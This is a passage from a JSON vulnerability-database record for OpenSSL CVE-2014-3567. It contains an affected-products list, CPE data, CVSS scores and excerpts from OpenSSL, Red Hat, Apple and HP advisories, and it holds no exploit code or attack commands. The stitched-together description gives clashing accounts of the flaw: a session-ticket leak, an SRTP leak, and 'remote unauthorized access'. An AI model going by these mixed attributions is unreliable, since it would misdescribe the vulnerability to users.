"ibm", "version": "v70001.3.0.5" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "msr2000", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "tivoli netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "qradar siem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "tivoli netcool/system service monitor fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.1" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8677" }, { "model": "nextscale n1200 enclosure fan power controller fhet17a-2.02", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "systems director common agent for linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "malware analyzer g2", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.1" }, { "model": "f", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "nextscale n1200 enclosure fan power controller fhet24j-2.10", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aspera enterprise server", "scope": "ne", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.2" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "qradar risk manager mr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "security network intrusion prevention system gx5108", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.2" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "switch series r1005p15", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "12900" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "office connect p", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "18100" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "aspera orchestrator", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "0" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.0" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "norman shark network protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.2.3" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "netscaler service delivery appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "oneview", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.20" }, { "model": "matrix operating environment", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.10" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "nextscale n1200 enclosure fan power controller fhet24g-2.09", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "manager for sle sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "111.7" }, { "model": "studio onsite", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "1.3" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.8" }, { "model": "cloudsystem foundation", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.1.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.0" }, { "model": "office connect pl", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "18100" }, { "model": "content analysis system", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "1.2.3.1" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "reporter\u0027s iso", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.4" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.05" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "systems insight manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "t", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "vsr1000 r0204p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.3" }, { "model": "flex system en6131 40gb ethernet switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.4.1110" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-476" }, { "model": "switch series r2311p05", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5920" }, { "model": "aspera point to point", "scope": "ne", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.2" }, { "model": "insight control server provisioning", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "systems director common agent for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.1" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.3" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "ei switch series r3108p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5130" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" } ], "sources": [ { "db": "BID", "id": "70586" }, { "db": "CNNVD", "id": "CNNVD-201410-636" }, { "db": "NVD", "id": "CVE-2014-3567" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "0.9.8zb", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3567" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "131306" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "131273" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "132085" }, { "db": "PACKETSTORM", "id": "128921" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "132080" } ], "trust": 0.8 }, "cve": "CVE-2014-3567", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 7.1, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "COMPLETE", "baseScore": 7.1, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2014-3567", "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3567", "trust": 1.0, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201410-636", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2014-3567", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3567" }, { "db": "CNNVD", "id": "CNNVD-201410-636" }, { "db": "NVD", "id": "CVE-2014-3567" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure. OpenSSL is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to crash the affected application, denying service to legitimate users. \nOpenSSL prior to 0.9.8zc, 1.0.0o, and 1.0.1j are vulnerable. This could be\nexploited in a Denial Of Service attack. This issue affects OpenSSL\n1.0.1 server implementations for both SSL/TLS and DTLS regardless of\nwhether SRTP is used or configured. Implementations of OpenSSL that\nhave been compiled with OPENSSL_NO_SRTP defined are not affected. \n\nThis issue was reported to OpenSSL on 26th September 2014, based on an original\nissue and patch developed by the LibreSSL project. Further analysis of the issue\nwas performed by the OpenSSL team. \n\nThe fix was developed by the OpenSSL team. \n\nThis issue was reported to OpenSSL on 8th October 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nSSL 3.0 Fallback protection\n===========================\n\nSeverity: Medium\n\nOpenSSL has added support for TLS_FALLBACK_SCSV to allow applications\nto block the ability for a MITM attacker to force a protocol\ndowngrade. \n\nSome client applications (such as browsers) will reconnect using a\ndowngraded protocol to work around interoperability bugs in older\nservers. This could be exploited by an active man-in-the-middle to\ndowngrade connections to SSL 3.0 even if both sides of the connection\nsupport higher protocols. SSL 3.0 contains a number of weaknesses\nincluding POODLE (CVE-2014-3566). \n\nhttps://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\nhttps://www.openssl.org/~bodo/ssl-poodle.pdf\n\nSupport for TLS_FALLBACK_SCSV was developed by Adam Langley and Bodo Moeller. \n\n\nBuild option no-ssl3 is incomplete (CVE-2014-3568)\n==================================================\n\nSeverity: Low\n\nWhen OpenSSL is configured with \"no-ssl3\" as a build option, servers\ncould accept and complete a SSL 3.0 handshake, and clients could be\nconfigured to send them. \n\nThis issue was reported to OpenSSL by Akamai Technologies on 14th October 2014. \n\nThe fix was developed by Akamai and the OpenSSL team. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20141015.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/about/secpolicy.html\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2014:1692-01\nProduct: Red Hat Storage\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-1692.html\nIssue date: 2014-10-22\nCVE Names: CVE-2014-3513 CVE-2014-3567 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that contain a backported patch to mitigate the\nCVE-2014-3566 issue and fix two security issues are now available for Red\nHat Storage 2.1. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Storage Server 2.1 - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary. \n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails. \n\nThis can prevent a forceful downgrade of the communication to SSL 3.0. \nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode. \nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication. \n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to mitigate the CVE-2014-3566 issue and correct\nthe CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect,\nall services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Storage Server 2.1:\n\nSource:\nopenssl-1.0.1e-30.el6_6.2.src.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3513\nhttps://access.redhat.com/security/cve/CVE-2014-3567\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/1232123\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUR/NUXlSAg2UNWIIRAlZHAJwPwsoiJDn5RhI6U8eFkIzxyQopkQCePynp\nRpfQCptdJIpd6WXO7pw1vVo=\n=T20t\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. This flaw allows a man-in-the-middle (MITM)\n attacker to decrypt a selected byte of a cipher text in as few as 256\n tries if they are able to force a victim application to repeatedly send\n the same data over newly created SSL 3.0 connections. \n\n This update adds support for Fallback SCSV to mitigate this issue. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-09-16-2 Xcode 7.0\n\nXcode 7.0 is now available and addresses the following:\n\nDevTools\nAvailable for: OS X Yosemite v10.10.4 or later\nImpact: An attacker may be able to bypass access restrictions\nDescription: An API issue existed in the apache configuration. This\nissue was addressed by updating header files to use the latest\nversion. \nCVE-ID\nCVE-2015-3185 : Branko Aibej of the Apache Software Foundation\n\nIDE Xcode Server\nAvailable for: OS X Yosemite 10.10 or later\nImpact: An attacker may be able to access restricted parts of the\nfilesystem\nDescription: A comparison issue existed in the node.js send module\nprior to version 0.8.4. This issue was addressed by upgrading to\nversion 0.12.3. \nCVE-ID\nCVE-2014-6394 : Ilya Kantor\n\nIDE Xcode Server\nAvailable for: OS X Yosemite v10.10.4 or later\nImpact: Multiple vulnerabilties in OpenSSL\nDescription: Multiple vulnerabilties existed in the node.js OpenSSL\nmodule prior to version 1.0.1j. \nCVE-ID\nCVE-2014-3513\nCVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\nIDE Xcode Server\nAvailable for: OS X Yosemite v10.10.4 or later\nImpact: An attacker with a privileged network position may be able\nto inspect traffic to Xcode Server\nDescription: Connections to Xcode Server may have been made without\nencryption. This issue was addressed through improved network\nconnection logic. \nCVE-ID\nCVE-2015-5910 : an anonymous researcher\n\nIDE Xcode Server\nAvailable for: OS X Yosemite v10.10.4 or later\nImpact: Build notifications may be sent to unintended recipients\nDescription: An access issue existed in the handling of repository\nemail lists. This issue was addressed through improved validation. \nCVE-ID\nCVE-2015-5909 : Daniel Tomlinson of Rocket Apps, David Gatwood of\nAnchorfree\n\nsubversion\nAvailable for: OS X Yosemite v10.10.4 or later\nImpact: Multiple vulnerabilities existed in svn versions prior to\n1.7.19\nDescription: Multiple vulnerabilities existed in svn versions prior\nto 1.7.19. These issues were addressed by updating svn to version\n1.7.20. \nCVE-ID\nCVE-2015-0248\nCVE-2015-0251\n\n\nXcode 7.0 may be obtained from:\nhttps://developer.apple.com/xcode/downloads/\n\nTo check that the Xcode has been updated:\n\n* Select Xcode in the menu bar\n* Select About Xcode\n* The version after applying this update will be \"7.0\". \n\nRelease Date: 2014-10-28\nLast Updated: 2014-10-28\n\nPotential Security Impact: Remote Denial of Service (DoS), unauthorized\naccess, man-in-the-middle (MitM) attack\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP-UX running\nOpenSSL. \n\nThis is the SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"Poodle\", which could be exploited remotely to\nallow disclosure of information. \n\nReferences:\n\nCVE-2014-3566 Man-in-th-Middle (MitM) attack\nCVE-2014-3567 Remote Unauthorized Access\nCVE-2014-3568 Remote Denial of Service (DoS)\nSSRT101767\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, B.11.31 running OpenSSL versions before v0.9.8zc\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-3567 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1\nCVE-2014-3568 